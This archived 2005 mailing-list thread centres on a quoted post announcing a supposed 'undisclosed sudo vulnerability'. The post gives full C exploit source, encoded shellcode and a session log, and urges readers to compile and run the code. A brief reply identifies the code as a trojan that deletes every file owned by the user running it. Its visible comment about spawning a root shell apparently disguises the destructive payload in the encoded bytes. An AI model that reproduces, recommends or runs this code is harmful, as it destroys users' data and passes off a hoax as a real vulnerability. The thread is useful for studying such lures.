lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <004001c59577$2ee4a370$1a64110a@64DOG> Date: Sun Jul 31 03:22:22 2005 From: listuser at seifried.org (Kurt Seifried) Subject: Undisclosed Sudo Vulnerability ? This is a trojan that will nuke all the files owned by the user running it. -Kurt ----- Original Message ----- From: "Esler, Joel - Contractor" <joel.esler@...rt-s.army.mil> To: <full-disclosure@...ts.grok.org.uk> Sent: Saturday, July 30, 2005 12:40 PM Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ? > About two weeks ago, our proprietary LIDS detected some suspicious shell > activity on an internal .mil machine i am in charged of. Our server runs > latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled. > Before shutting down the machine and reinstalling it from scratch, we > installed sebek module to monitor all shell activity. Based on the data > we gathered, it seems the attacker gained root privileges using an > undisclosed bug in latest sudo. > > $ uname -a > Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 > GNU/Linux > > $ sudo -V > Sudo version 1.6.8p9 > > $ ls -al /tmp/.phc > -rwsr-xr-x 1 root root 304873 Jul 05 03:45 /tmp/.phc > > Here is an excerpt of a shell session we recorded: > > <.........> > $ cat >blaat.uue<<'EH' > -------------------------------------------------------------------------------- > EH > $ uudecode blaat.uue > $ cat sudoh.c > /* > * off by one ebp overwrite in sudo prompt parsing func (bground mode > only) > * > * "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard > Johnson > * > * gcc -pipe -o sudoh sudoh.c ; ./sudoh > * > * happy deathday route > * > */ > > #include <stdio.h> > #include <unistd.h> > #include <string.h> > #include <alloca.h> > > > #define SUDO_PROMPT "%u@%h> \\%" > #define shellcode esp > #define RETS_NUM 246 /* generic */ > #define NOPS_NUM 116 /* generic */ > > > /* > * Linux x86 non-interactive exec > * {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c") > */ > > char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ > = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" > "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" > "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" > "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" > "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" > "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" > "\x6e\x2f\x73\x68\x00\x2d\x63\x00" > "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;"; > /* = "\xcc\xeb\xfe"; */ > > > > void fill (char *buff, int size, unsigned long val) > { > unsigned long *ptr = (unsigned long *) buff; > > for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = > val; > } > > > unsigned long get_sp (void) > { > __asm__ ("lea esp, %eax"); > } > > > char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode) > { > int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen > (shellcode); > unsigned char *nops = alloca (nops_nums); > unsigned char *rets = alloca (rets_nums); > unsigned long ret = get_sp (); > static char exp_buffer [8192]; > > /* make sure sudo isatty() fails */ > close (0); close (1); close (2); > > fill (nops, (unsigned char) nops_nums, 0x90909090); > fill (rets, (unsigned char) rets_nums, ret); > > /* be nice plz */ > if (size > sizeof (exp_buffer)) { > fprintf (stderr, "buffer's t00 small..\n"); > return NULL; > } > > snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s", > SUDO_PROMPT, /* evilz prompt */ > nops, > shellcode, > rets); > > /* exploit buff */ > return exp_buffer; > } > > > > int main(int argv, char *argc[]) > { > char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode); > > /* thanks again T0dd :) */ > > execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, > "/bin/false", NULL); > > /* ok, shellroot should await you @ "HISTFILE=/dev/null > /tmp/.phc -p" */ > > return 0; > } > > $ gcc -pipe -o sudoh sudoh.c > {standard input}: Assembler messages: > {standard input}:5: Warning: Ignoring changed section attributes for .text > $ ./sudoh > $ cat /bin/cat > blaat.uue; rm blaat.uue > $ cat /bin/cat > sudoh.c; rm sudoh.c > $ cat /bin/cat > sudoh; rm sudoh > $ HISTFILE=/dev/null /tmp/.phc -p > id > uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody) > <.........> > > > Todd Miller, the maintainer of Sudo has been informed yesterday, and it > is strongly advised to "sudo su -c chmod -s sudo" until a patch is out. > > > J > > Joel Esler, GCIA > joel.esler@...rt-s.army.mil > 706-791-7165 DSN: 780-7165 > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
Powered by blists - more mailing lists